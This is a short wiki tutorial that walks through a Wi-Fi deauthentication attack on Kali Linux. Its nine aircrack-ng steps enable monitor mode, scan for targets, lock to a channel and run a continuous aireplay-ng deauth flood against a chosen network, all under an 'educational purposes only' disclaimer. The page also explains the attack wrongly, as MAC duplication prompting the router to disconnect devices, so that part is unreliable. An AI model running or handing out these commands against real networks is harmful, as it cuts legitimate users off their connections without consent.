Deauthentication Attack using Kali Linux

From roonics
Revision as of 16:17, 18 August 2022 by Jlambert (talk | contribs)
Jump to navigation Jump to search

This article will show you how to disconnect devices from a network with a deauth attack using Kali Linux and the aircrack-ng suite.

NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY.

In short a deauth attach makes your wifi card in monitor mode spoof a MAC address of something already connected to the network, the router then says "Hey, there are two devices on here with the same MAC address" it then sends a command to all connected devices to re authenticate, kicking them off the network forcing them to re join. Obviously if you are continuing to run the attack this will happen over and over again meaning devices wont be able to connect to the wifi.

The above is a simple explanation, if you want more technical detail.....Google it.

Before we start my wifi adapter is wlan0 so you will need to adjust the commands if your adapter is a different name.


1. Down the wifi adapter

sudo ifconfig wlan0 down

2. Kill airmon-ng if it's running

sudo airmon-ng check kill

3. Put adapter in monitor mode

sudo iwconfig wlan0 mode monitor

4. Up the adapter

sudo ifconfig wlan0 up

5. Start airmon-ng

sudo airmon-ng start wlan0

6. Scan for networks, make a note of the MAC address and channel of the network you wish to target

sudo airodump-ng -a wlan0

7. Lock your adapter to the channel of the network you wish to target

sudo iwconfig wlan0 channel 14

8. Now start to capture some packets using the MAC address and channel

sudo airodump-ng -a wlan0 --bssid XX:XX:XX:XX:XX:XX --channel 14

You should see something like this

9. Leave this running and open another putty session and start the attack

sudo aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX wlan0

You should see something like this